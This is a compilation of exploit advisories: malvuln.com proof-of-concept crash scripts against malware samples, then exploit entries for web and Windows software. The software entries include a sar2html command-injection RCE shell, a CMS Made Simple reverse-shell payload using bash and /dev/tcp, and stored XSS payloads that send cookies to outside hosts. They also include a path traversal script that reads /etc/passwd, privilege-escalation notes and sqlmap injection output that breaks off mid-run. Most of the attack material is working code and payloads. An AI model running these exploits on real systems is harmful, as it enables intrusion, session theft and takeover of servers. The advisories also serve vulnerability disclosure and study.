Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/b85ae73dbbfff1d3b90cb7c78356f2a3.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: HEUR.RISKTOOL.WIN32.BITMINER.GEN
Vulnerability: Remote Memory Corruption 
Description: Null pointer write access violation on server response to an HTTP request to TCP port 8046. The program also connects to port 80 and respawns upon crashing.


Type: PE32
MD5: b85ae73dbbfff1d3b90cb7c78356f2a3
Vuln ID: MVID-2021-0009
Dropped files: SQLAGENTSI.exe, AutoRunApp.vbs, VBS.vbs
ASLR: False
Safe SEH: True
Disclosure: 01/02/2021

Memory Dump:
0:012> .ecxr
eax=0e4e3beb ebx=05d8b4c0 ecx=74d07084 edx=04370850 esi=05db2b00 edi=05d8b028
eip=05d8b4c2 esp=05c3ff0c ebp=05c3ff3c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
05d8b4c2 0000            add     byte ptr [eax],al          ds:002b:0e4e3beb=??

ExceptionAddress: 05d8b4c2
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 0e4e3beb
Attempt to write to address 0e4e3beb

0:012> !address 0e4e3beb
Usage:                  Free
Base Address:           0a860000
End Address:            5a2c0000
Region Size:            4fa60000
Type:                   00000000  
State:                  00010000  MEM_FREE
Protect:                00000001  PAGE_NOACCESS


The specimen has also thrown exploitable Guard page violation. A page of memory that marks the end of a data structure, such as a stack or an array, has been accessed.

ExceptionAddress: 2a8dd862
   ExceptionCode: 80000001 (Guard page violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 33036b23

0:012> .ecxr
eax=33036b23 ebx=2a8dd860 ecx=74d07084 edx=044c0850 esi=2a921548 edi=2a8ddf60
eip=2a8dd862 esp=05c0ff0c ebp=05c0ff3c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
2a8dd862 0000            add     byte ptr [eax],al          ds:002b:33036b23=??


Exploit/PoC:
import socket

port=8046
payload="A"*256
max_flood=666
c=0

def doit():
    global c,payload,port
    s = socket.socket()
    try:
        host = ''
        s.bind((host, port))            
        s.listen(5)

        print('HEUR.RiskTool.Win32.BitMiner.gen / Remote Memory Corruption')
        print('MD5: b85ae73dbbfff1d3b90cb7c78356f2a3')
        print("By malvuln")

        while c < max_flood:
            c+=1
            conn, addr = s.accept()
            conn.send(payload+'\r\n')
            conn.close()
            if c==max_flood:
                break
    except Exception as e:
        pass


if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occuring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/bdcaed5042eba30f91b093f0bcb3caf3.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: TROJAN.WIN32.JORIK.DMSPAMMER.SZ
Vulnerability: Remote Memory Corruption
Description: Memory corruption on server response when making HTTP POST request for PHP file named "stat1.php" on TCP Port 80.

Type: PE32
MD5: bdcaed5042eba30f91b093f0bcb3caf3
Vuln ID: MVID-2021-0008
Dropped files: svcnost.exe 
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 1/2/2021

Memory Dump: 
(1dc4.14dc): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=ffffefff edx=00000000 esi=00000003 edi=00000003
eip=773ced3c esp=0acbf444 ebp=0acbf5d4 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400          ret     14h

0:003> .exr -1
ExceptionAddress: 03b2657b
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 0ada1000
Attempt to read from address 0ada1000

0:003> .ecxr
eax=e5cb4ea8 ebx=00000002 ecx=ffffefff edx=00000000 esi=0ada1000 edi=0adc2390
eip=03b2657b esp=0acbfd84 ebp=0acbfdc4 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
03b2657b f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

0:003> dd 0adc0008 
0adc0008  41414141 41414141 41414141 41414141
0adc0018  41414141 41414141 41414141 41414141
0adc0028  41414141 41414141 41414141 41414141
0adc0038  41414141 41414141 41414141 41414141


Exploit/PoC:
import socket

port=80
payload="A"*4000

def doit():
    global payload
    s = socket.socket()
    try:
        host = ''
        s.bind((host, port))            
        s.listen(5)                    

        print('TROJAN.WIN32.JORIK.DMSPAMMER.SZ / Remote Memory Corruption')
        print('MD5: bdcaed5042eba30f91b093f0bcb3caf3')
        print("By malvuln")

        while True:
            conn, addr = s.accept()
            conn.send(payload+'\r\n')
            conn.close()
    except Exception as e:
        pass

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occuring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/f4d7d721f68bc9a80aaf53bc184a3c58.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Phorpiex
Vulnerability: Insecure permissions EoP
Description: Change permissions are granted to authenticated users on the dir housing the malware.

Type: PE32
MD5: f4d7d721f68bc9a80aaf53bc184a3c58
Vuln ID: MVID-2021-0007
Dropped files: svchost.exe
Disclosure: 01/02/2021

Exploit/PoC:
c:\>cacls C:\11973197639004\svchost.exe
C:\11973197639004\svchost.exe BUILTIN\Administrators:(ID)F
                              NT AUTHORITY\SYSTEM:(ID)F
                              BUILTIN\Users:(ID)R
                              NT AUTHORITY\Authenticated Users:(ID)C


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occuring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/f78cef7588f9c32609a4932d10c67f95.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: BACKDOOR.WIN32.BNLITE
Vulnerability: Remote Heap Corruption
Description: When sending a specially crafted payload to TCP Port 5000, the backdoor malware will suffer a Heap Corruption.

Type: PE32
MD5: f78cef7588f9c32609a4932d10c67f95
Vuln ID: MVID-2021-0012
Dropped files: NBLF32.exe
ASLR: False 
Safe SEH: True
Disclosure: 01/02/2021 

Memory Dump: 
PROCESS_NAME:  NBLF32.exe
FAULTING_MODULE: 77360000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP:  0
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  30322326
READ_ADDRESS:  30322326 

FOLLOWUP_IP: 
ntdll!RtlAllocateHeap+19ba
773a2d6a 8b09            mov     ecx,dword ptr [ecx]

FAULTING_THREAD:  00000b84
DEFAULT_BUCKET_ID:  HEAP_CORRUPTION
PRIMARY_PROBLEM_CLASS:  HEAP_CORRUPTION
BUGCHECK_STR:  APPLICATION_FAULT_HEAP_CORRUPTION_STRING_DEREFERENCE_INVALID_POINTER_READ_WRONG_SYMBOLS
LAST_CONTROL_TRANSFER:  from 773a16b7 to 773a2d6a 

0:000> .ecxr
eax=0000263b ebx=026fa980 ecx=30322326 edx=3b333532 esi=026fa988 edi=026d0000
eip=773a2d6a esp=0019fcf0 ebp=0019feb0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
ntdll!RtlAllocateHeap+0x19ba:
773a2d6a 8b09            mov     ecx,dword ptr [ecx]  ds:002b:30322326=????????


Exploit/PoC:
from socket import *
#NBLF32.exe HEAP CORRUPTION
#May need to send payload twice consecutively
#or wait for reboot if exploit fails first time.
#===============================================
MALWARE_INFECTED_HOST=x.x.x.x

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_INFECTED_HOST, 5000))

PAYLOAD="DELETE / HTTP/1.0 KýΛ@g5”ö?KýΛ@g5”ö?"*44220

s.send(PAYLOAD)
s.close()

print("Backdoor.Win32.BNLite Malware / Remote Heap Corruption")
print("MD5: f78cef7588f9c32609a4932d10c67f95")
print("By malvuln")


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occuring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/79d9908b6769e64f922e74a090f5ceeb.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zombam.k
Vulnerability: Remote String Dereference Stack Buffer Overflow

Description: HTTP RAT 0.21 Backdoor Webserver By z0mbie, create's on the fly executable backdoors that can listen on various ports you specify. The main executable
then spits out a binary named "httpserver.exe" listening on the port specified in the backdoor creation steps. Sadly, the backdoor is vulnerable to stack buffer overflow
by sending a large HTTP GET request of 1000 bytes or so to the listening backdoor port. 


Type: PE32
MD5: 79d9908b6769e64f922e74a090f5ceeb
Vuln ID: MVID-2021-0015
Dropped files: httpserver.exe

ASLR: False
DEP: False
Safe SEH: True
Disclosure: 1/4/2021

Memory Dump:
EAX : 0574FA40
EBX : 03FE02A0
ECX : 00000415     L'Е'
EDX : 41414141
EBP : 0574FA28
ESP : 0574F9F0
ESI : 03FE02A0
EDI : 00405076     httpserver.00405076
EIP : 00402906     httpserver.00402906


(12f4.e58): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=0494fa20 edx=41414141 esi=00000003 edi=00000003
eip=773ced3c esp=0494f0bc ebp=0494f24c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400          ret     14h


0:004> .ecxr
eax=0494f9f0 ebx=04020300 ecx=0494fa20 edx=41414141 esi=04020300 edi=00405076
eip=0040292e esp=0494f9d8 ebp=0494fa28 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
*** WARNING: Unable to verify checksum for httpserver.exe
*** ERROR: Module load completed but symbols could not be loaded for httpserver.exe
httpserver+0x292e:
0040292e 8b4204          mov     eax,dword ptr [edx+4] ds:002b:41414145=????????

FAULTING_IP: 
httpserver+292e
0040292e 8b4204          mov     eax,dword ptr [edx+4]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0040292e (httpserver+0x0000292e)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 41414145
Attempt to read from address 41414145

PROCESS_NAME:  httpserver.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  41414145

READ_ADDRESS:  41414145 

FOLLOWUP_IP: 
httpserver+292e
0040292e 8b4204          mov     eax,dword ptr [edx+4]

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  00000e58

BUGCHECK_STR:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 004024ce to 0040292e

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
0494fa28 004024ce 41414141 0494fa40 00000415 httpserver+0x292e
0494faa4 41414141 41414141 41414141 41414141 httpserver+0x24ce
0494faa8 41414141 41414141 41414141 41414141 0x41414141
0494faac 41414141 41414141 41414141 41414141 0x41414141
0494fab0 41414141 41414141 41414141 41414141 0x41414141
0494fab4 41414141 41414141 41414141 41414141 0x41414141


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

JUNK="A"*2000 
PAYLOAD="GET /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PAYLOAD)
s.close()
print("Remote Buffer Overflow")
print("MD5: 79d9908b6769e64f922e74a090f5ceeb")
print("By Malvuln")



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
# Date: 2020-12-15
# Exploit Author: icekam
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
# Software Link: https://github.com/intelliants/subrion
# Version: Subrion CMS 4.2.1
# CVE : CVE-2020-35437

stored xss vulnerability in /_core/profile/.
 Reproduce through the avatar[path] parameter in post /_core/profile/ url.
 payload:"><sCrIpT>alert(1)</sCrIpT>

https://github.com/intelliants/subrion/issues/880

# Exploit Title:  IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage:  https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
<p>Upload your file</p>
<input type="file" name="Filedata"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>

# Exploit Title: House Rental and Property Listing 1.0 - Multiple Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2020-12-28
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14649/house-rental-and-property-listing-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14649&title=House+Rental+and+Property+Listing+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application

Step 1: Create a new user then login
Step 2: Click on "Register" page to register a room.
Step 3: input "<script>alert("Full name")</script>" in all fields each one with the field name except phone number, alternate number.
Note: for the email address you can inspect elements and change the type from email to text.
Step 4: Once all fields are completed, Click on Submit
Step 5: From the home page click on Details/Update, This will trigger all Stored XSS payloads one after the other.

# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
# Date: 2021-01-04
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 8.0.0.1039
# File Version: 8.0.0.1039
# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname,
pathname, startmode, startname

DisplayName                             Name    PathName
                                              StartMode  StartName
Intel(R) Matrix Storage Event Monitor  IAANTMON C:\Program Files
(x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe   Auto
LocalSystem

# 2. To check service info:

C:\>sc qc "IAANTMON"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: IAANTMON
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel Matrix
Storage Manager\IAANTMon.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Intel(R) Matrix Storage Event Monitor
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:

To exploit this vulnerability an attacker requires to drop a malicious
executable into the service path undetected by the OS in order
to gain SYSTEM privileges.

# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting
# Exploit Author: Shivam Verma(cyb3r_n3rd)
# Date: 2020-12-25
# Google Dork: N/A
# Vendor Homepage: https://www.click2magic.com/user/agent/index
# Software Link: https://www.click2magic.com
# Version: 1.1.5
# Category: Web Application
# Tested on: Kali Linux

Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data

Step 1. visit the link
Step 2. Start a new Chat
Step 3. When ask for name paste your Xss Payload
Step 4. Wait for the Administrator to click on Your link
Step 5. You will receive Admin Cookie Everytime he Process the Request

---

XSS Payload: "><script src=https://.xss.ht></script>

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Mesut Cetin
# Vendor Homepage: http://egavilanmedia.com
# Version: 1.0
# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34

Vulnerable parameter: email, gender, username
Payload: <script>alert(document.cookie)</script>

Proof of Concept:

To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:

1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
2. Click above right on the "Profile" tab
3. Navigate to the "Edit Profile" tab
4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
5. Capture the POST request in Burp Suite and manipulate the parameter as shown:

POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
Host: demo.egavilanmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://demo.egavilanmedia.com
Connection: close
Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e

fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin

6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker.

# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
<http://localhost/pluginabc%22-alert%28origin%29-%22abc>

2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

# Exploit Title: Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
# Date: 21.12.2020
# Exploit Author: Adrian Bondocea
# Vendor Homepage: https://www.fluentd.org/
# Software Link: https://td-agent-package-browser.herokuapp.com/4/windows
# Version: <v4.0.1
# Tested on: Windows 10 x64
# CVE : CVE-2020-28169
# External URL: https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169

Description:
The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.

Vulnerable Path: ( Authenticated Users have permission to write within the location )
PS C:\opt\td-agent\bin> icacls C:\opt\td-agent\bin
C:\opt\td-agent\bin BUILTIN\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                    BUILTIN\Users:(I)(OI)(CI)(RX)
                    NT AUTHORITY\Authenticated Users:(I)(M)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

Vulnerable service:
PS C:\opt\td-agent\bin> get-service fluentdwinsvc

Status   Name               DisplayName
------   ----               -----------
Running  fluentdwinsvc      Fluentd Windows Service

Service Path:
"C:/opt/td-agent/bin/ruby.exe" -C t"C:/opt/td-agent/lib/ruby/gems/2.7.0/gems/fluentd-1.11.2/lib/fluent/command/.."
 winsvc.rb --service-name fluentdwinsvc

# Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal
# Date: 12/12/2018 (PoC)
# Date: 04/01/2020 (Auto Exploit)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: intitle:"Responsive FileManager 9.x.x"
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/tag/v9.13.4
# Version: < 9.13.4
# Tested on: Linux 64bit + Python3

#!/usr/bin/python3

# Usage: python exploit.py [URL] [SESSION] [File Path]
# python3 exploit.py http://local.lc:8081 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd

import requests
import sys

def usage():
  if len(sys.argv) != 4:
  print("Usage: python3 exploit.py [URL]")
  sys.exit(0)

def copy_cut(url, session_cookie, file_name):
  headers = {'Cookie': session_cookie,
'Content-Type': 'application/x-www-form-urlencoded'}
  url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url)
  r = requests.post(
  url_copy, data="sub_action=copy&path=../../../../../../.."+file_name,headers=headers)
  return r.status_code

def paste_clipboard(url, session_cookie):
  headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'}
  url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
  r = requests.post(
  url_paste, data="path=", headers=headers)
  return r.status_code

def read_file(url, file_name):
  name_file = file_name.split('/')[-1]
  url_path = "%s/source/%s" % (url,name_file) #This is the default directory,
  #if the website is a little different, edit this place
  result = requests.get(url_path)
  return result.text

def main():
  usage()
  url = sys.argv[1]
  session_cookie = sys.argv[2]
  file_name = sys.argv[3]
  print("[*] Copy Clipboard")
  copy_result = copy_cut(url, session_cookie, file_name)
  if copy_result==200:
    paste_result = paste_clipboard(url, session_cookie)
  else:
    print("[-] Paste False")
  if paste_result==200:
    print("[*] Paste Clipboard")
    print(read_file(url, file_name))
  else:
    print("[-] Copy False")

if __name__ == "__main__":
  main()

# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Version: 1
# Tested on Windows

Vulnerable Parameters: Edit Page tab

Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side.
2: Add the new post and then add the payload "<audio src/onerror=alert(document.cookie)>" in "Post title" parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.

# Exploit Title: Responsive E-Learning System 1.0 – 'id' Sql Injection
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql
Injection.

*Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17
-p <http://localhost/elearning/delete_teacher_students.php?id=17%0D-p> id

# sqlmap -u
http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id

        ___


__H__


 ___ ___["]_____ ___ ___
{1.3.11#stable}

|_ -| . [.]     | .'| .
|

|___|_  [']_|_|_|__,|
_|

      |_|V...       |_|   http://sqlmap.org




[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program



[*] starting @ 08:59:01 /2020-12-24/


08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a
false positive

GET parameter 'id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 402
HTTP(s) requests:

---

Parameter: id (GET)

    Type: boolean-based blind

